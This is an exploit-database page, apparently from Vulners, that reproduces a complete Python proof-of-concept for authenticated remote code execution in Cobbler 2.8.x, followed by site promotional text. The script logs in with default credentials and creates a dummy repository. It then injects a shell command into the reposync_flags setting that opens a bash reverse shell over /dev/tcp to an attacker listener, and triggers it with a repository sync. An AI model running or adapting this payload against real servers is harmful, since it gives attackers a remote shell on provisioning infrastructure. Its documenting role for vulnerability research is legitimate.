Vulners
Lucene search
Cobbler 2.8.0 - (Authenticated) Remote Code Execution
#!/usr/bin/python
"""
# Exploit title: Cobbler 2.8.x Authenticated RCE.
# Author: Dolev Farhi
# Contact: dolevf at protonmail.com (@hack6tence)
# Date: 03-16-2017
# Vendor homepage: cobbler.github.io
# Software version: v.2.5.160805
Software Description
=====================
Cobbler is a Linux installation server that allows for rapid setup of network installation environments. It glues together and automates many associated Linux tasks so you do not have to hop between many various commands and applications when deploying new systems, and, in some cases, changing existing ones.
Cobbler can help with provisioning, managing DNS and DHCP, package updates, power management, configuration management orchestration, and much more.
Vulnerability Description
=========================
Authenticated RCE
"""
import uuid
import sys
import requests
# Custom variables
cobbler_server = 'http://192.168.2.235/cobbler_web/'
cobbler_user = 'cobbler'
cobbler_pass = 'cobbler'
netcat_listener = '192.168.2.51/4444'
# Cobbler variables
cobbler_url = '%s/do_login' % cobbler_server
cobbler_settings_url = '%s/setting/save' % cobbler_server
cobbler_reposync = '%s/reposync' % cobbler_server
cobbler_reposave = '%s/repo/save' % cobbler_server
cobbler_repo_name = str(uuid.uuid4()).split('-')[0]
class Cobbler():
def __init__(self):
self.client = requests.session()
self.client.get('%s' % cobbler_server)
self.csrftoken = self.client.cookies['csrftoken']
self.headers = dict(Referer=cobbler_url)
self.login_data = dict(csrfmiddlewaretoken=self.csrftoken, next='/cobbler_web', username=cobbler_user, password=cobbler_pass)
self.client.post(cobbler_url, data=self.login_data, headers=self.headers)
def create_repo(self):
print("Creating dummy repository...")
self.repoinfo = dict(
csrfmiddlewaretoken=self.csrftoken,
editmode='new',
subobject='False',
submit='Save',
arch='i386',
breed='yum',
comment='',
keep_updated='',
mirror='',
name=cobbler_repo_name,
owners='admin',
rpm_list='',
proxy='',
apt_components='',
apt_dists='',
createrepo_flags='',
environment='',
mirror_locally='',
priority='99',
yumopts='')
self.client.post(cobbler_reposave, data=self.repoinfo, headers=self.headers)
def post_payload(self):
print("Configuring reposync flags with the payload...")
self.payload = dict(csrfmiddlewaretoken=self.csrftoken, editmode='edit', subobject='False', submit='Save', name='reposync_flags', value='-h; bash -i >& /dev/tcp/%s 0>&1 &' % netcat_listener)
self.client.post(cobbler_settings_url, data=self.payload, headers=self.headers)
def get_shell(self):
self.create_repo()
self.post_payload()
print("Executing repository sync... expecting reverse shell. this may take a few seconds.")
self.client.post(cobbler_reposync, data={'csrfmiddlewaretoken':self.csrftoken}, headers=self.headers)
if __name__ == '__main__':
cobbler = Cobbler()
cobbler.get_shell()
sys.exit()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Mar 2017 00:00Current
7.4High risk
Vulners AI Score7.4